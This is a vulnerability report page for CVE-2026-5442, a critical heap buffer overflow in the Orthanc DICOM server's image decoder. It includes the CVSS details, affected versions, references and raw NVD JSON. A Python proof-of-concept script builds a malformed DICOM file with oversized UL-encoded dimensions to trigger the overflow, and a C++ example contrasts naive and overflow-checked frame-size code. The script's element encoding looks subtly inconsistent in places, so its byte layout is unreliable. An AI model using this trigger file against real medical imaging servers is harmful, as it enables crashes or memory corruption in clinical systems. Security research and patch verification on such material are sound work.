Security Vulnerability Report

CVE-2026-5442 (CVSS 9.8, CRITICAL)

Published: 2026-04-09 15:16:17
Last Modified: 2026-04-14 20:19:46

Description

A heap buffer overflow vulnerability exists in the DICOM image decoder. Dimension fields are encoded using Value Representation (VR) Unsigned Long (UL), instead of the expected VR Unsigned Short (US), which allows extremely large dimensions to be processed. This causes an integer overflow during frame size calculation and results in out-of-bounds memory access during image decoding.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE
Orthanc Server, versions before 1.12.11 according to the CPE match data in the record (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# This is a conceptual PoC to demonstrate the vulnerability trigger.
# It constructs a malformed DICOM file with VR UL (Unsigned Long)
# instead of VR US (Unsigned Short) for dimension fields.
import struct


def create_malformed_dicom(filename):
    # Minimal DICOM preamble and prefix
    preamble = b'\x00' * 128
    prefix = b'DICM'

    # File Meta Information Group Length (Tag: (0002,0000))
    # Using VR UL (Unsigned Long) incorrectly for demonstration purposes,
    # though the bug specifically lies in image dimension parsing.
    fmi_group_len = struct.pack('<HHL', 0x0002, 0x0000, 0x00000004) + b'UL' + struct.pack('<L', 100)

    # Transfer Syntax UID (Tag: (0002,0010))
    ts_uid = struct.pack('<HH', 0x0002, 0x0010) + b'UI' + b'\x00\x00' + b'1.2.840.10008.1.2.1'

    # Dataset: Image Dimensions (Rows - Tag: (0028,0010))
    # Vulnerability: Using 'UL' VR instead of 'US'
    # Setting a very large value to trigger integer overflow in size calculation
    large_dim = 0xFFFFFFFF
    rows_tag = struct.pack('<HH', 0x0028, 0x0010)
    rows_vr = b'UL'
    rows_len = struct.pack('<L', 4)
    rows_val = struct.pack('<L', large_dim)

    # Columns (Tag: (0028,0011)) - same technique
    cols_tag = struct.pack('<HH', 0x0028, 0x0011)
    cols_vr = b'UL'
    cols_len = struct.pack('<L', 4)
    cols_val = struct.pack('<L', large_dim)

    # Pixel Data (Tag: (7FE0,0010)) - Dummy data
    pixel_tag = struct.pack('<HH', 0x7FE0, 0x0010)
    pixel_vr = b'OB'
    pixel_len = struct.pack('<L', 0xFFFFFFFF)  # Undefined length
    pixel_data = b'A' * 100  # Some padding

    with open(filename, 'wb') as f:
        f.write(preamble + prefix)
        f.write(fmi_group_len + ts_uid)
        f.write(rows_tag + rows_vr + rows_len + rows_val)
        f.write(cols_tag + cols_vr + cols_len + cols_val)
        f.write(pixel_tag + pixel_vr + pixel_len + pixel_data)

    print(f"[+] Malformed DICOM file created: {filename}")
    print("[+] This file attempts to trigger the buffer overflow via VR mismatch.")


if __name__ == "__main__":
    create_malformed_dicom("exploit_dicom.dcm")
```
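As an added illustration of the mechanism the description gives (example code written for this page, not Orthanc's decoder): a hypothetical naive reader that trusts a UL-encoded Rows/Columns value and multiplies in 32-bit arithmetic, beside a hardened reader that insists on VR US and overflow-checked multiplication. Element, parse_short_element, naive_frame_size and checked_frame_size are names chosen here; the element bytes are constructed inline in the UL 0xFFFFFFFF shape the PoC above writes, plus a well-formed US 512x512 pair.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <optional>
// One explicit-VR little-endian data element (2-byte-length header form only).
struct Element { uint16_t group, elem; char vr[3]; uint16_t length; const uint8_t* value; };
// Parses one element with the 8-byte header used by US, UL and similar VRs (little-endian host assumed); false on truncation.
static bool parse_short_element(const uint8_t* p, size_t n, Element& e, size_t& used) {
    if (n < 8) return false;
    std::memcpy(&e.group, p, 2); std::memcpy(&e.elem, p + 2, 2);
    e.vr[0] = p[4]; e.vr[1] = p[5]; e.vr[2] = '\0';
    std::memcpy(&e.length, p + 6, 2);
    if (n - 8 < e.length) return false;  // value would run past the buffer
    e.value = p + 8; used = 8 + e.length;
    return true;
}
// Bug-class model (hypothetical, not Orthanc's code): trusts whatever width the element carries and multiplies in 32 bits.
static uint32_t naive_frame_size(const Element& rows, const Element& cols, uint32_t bpp) {
    uint32_t r = 0, c = 0;
    std::memcpy(&r, rows.value, rows.length < 4 ? rows.length : 4);
    std::memcpy(&c, cols.value, cols.length < 4 ? cols.length : 4);
    return r * c * bpp;  // wraps silently: 0xFFFFFFFF * 0xFFFFFFFF * 1 == 1 in uint32_t arithmetic
}
// Hardened path: a dimension must be VR US, length 2 and non-zero.
static std::optional<uint16_t> read_us_dimension(const Element& e) {
    if (std::strcmp(e.vr, "US") != 0 || e.length != 2) return std::nullopt;
    uint16_t v; std::memcpy(&v, e.value, 2);
    if (v == 0) return std::nullopt;
    return v;
}
// Frame size with overflow-checked multiplication (__builtin_mul_overflow is a GCC/Clang builtin).
static std::optional<uint32_t> checked_frame_size(const Element& rows, const Element& cols, uint32_t bpp) {
    auto r = read_us_dimension(rows), c = read_us_dimension(cols);
    if (!r || !c) return std::nullopt;
    uint32_t acc;
    if (__builtin_mul_overflow(uint32_t(*r), uint32_t(*c), &acc)) return std::nullopt;
    if (__builtin_mul_overflow(acc, bpp, &acc)) return std::nullopt;
    return acc;
}
// Constructed samples: Rows/Columns as UL 0xFFFFFFFF (the shape the PoC writes) and as well-formed US 512.
static const uint8_t kBadRows[] = {0x28,0x00,0x10,0x00,'U','L',0x04,0x00,0xFF,0xFF,0xFF,0xFF};
static const uint8_t kBadCols[] = {0x28,0x00,0x11,0x00,'U','L',0x04,0x00,0xFF,0xFF,0xFF,0xFF};
static const uint8_t kGoodRows[] = {0x28,0x00,0x10,0x00,'U','S',0x02,0x00,0x00,0x02};
static const uint8_t kGoodCols[] = {0x28,0x00,0x11,0x00,'U','S',0x02,0x00,0x00,0x02};
int main() {  // prints "naive frame size: 1, hardened: rejected" for the UL sample
    Element r, c; size_t used;
    parse_short_element(kBadRows, sizeof kBadRows, r, used); parse_short_element(kBadCols, sizeof kBadCols, c, used);
    std::printf("naive frame size: %u, hardened: %s\n", naive_frame_size(r, c, 1), checked_frame_size(r, c, 1) ? "accepted" : "rejected");
}
```

Compile with g++ or clang++ in C++17 mode (std::optional); the hardened path rejects the UL sample before any frame buffer is sized, which is the check the description implies a decoder needs.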

References

https://kb.cert.org/vuls/id/536588 (Third Party Advisory, VDB Entry)
https://www.machinespirits.de/ (Not Applicable)
https://www.orthanc-server.com/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5442",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T15:16:16.543",
    "lastModified": "2026-04-14T20:19:46.320",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A heap buffer overflow vulnerability exists in the DICOM image decoder. Dimension fields are encoded using Value Representation (VR) Unsigned Long (UL), instead of the expected VR Unsigned Short (US), which allows extremely large dimensions to be processed. This causes an integer overflow during frame size calculation and results in out-of-bounds memory access during image decoding."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.12.11",
                "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]},
      {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]},
      {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}
```